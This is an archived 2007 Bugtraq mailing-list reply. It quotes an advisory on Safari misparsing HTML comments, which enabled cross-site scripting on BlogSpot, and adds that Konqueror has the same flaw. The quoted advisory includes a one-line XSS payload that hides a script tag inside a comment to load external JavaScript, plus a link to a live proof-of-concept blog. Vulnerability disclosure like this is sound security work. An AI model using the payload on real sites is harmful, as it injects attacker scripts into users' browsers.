| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Wed, 24 Jan 2007 06:06:34 +0100 From: Robert Tasarz <robert.tasarz@...entech.pl> To: bugtraq@...urityfocus.com Subject: Re: Safari Improperly Parses HTML Documents & BlogSpot XSS vulnerability Jose Avila III wrote: > Overview: > > Safari on occasions may improperly parse the source of an HTML document, > which can lead to the execution of html tags within comments. This can > become dangerous when input filters allow html tags within comments, as > they will get parsed and executed under certain circumstances. > > Details: > > In some cases you can cause Appleās Safari browser to execute code when > it should not be executed. In the following example everything within > the comment, in theory should never be executed; however, safari decides > to execute the script tag. > > <title>myblog<!--</title></head><body><script > src=http://beanfuzz.com/bean.js> --></title> > > Blogs hosted on BlogSpot.com have filter mechanisms for their input; > however, they will allow you to inject anything within comments. This > made it possible to cross site script blogspot.com. Note: Only Safari > viewers will be affected. > > Proof of concept: http://dirtybean1234.blogspot.com/ > > Initial release of vulnerability: http://www.beanfuzz.com/wordpress/?p=99 > > Vendor Response: > > I was unable to get a response from the vendor in regards to this issue > > Questions / Comments: > Jose (at) onzra (dot) com > As could be expected, the same problem exists in Konqueror (tested v.3.5.5 on Debian GNU/Linux Sid). regards, Robert Tasarz
Powered by blists - more mailing lists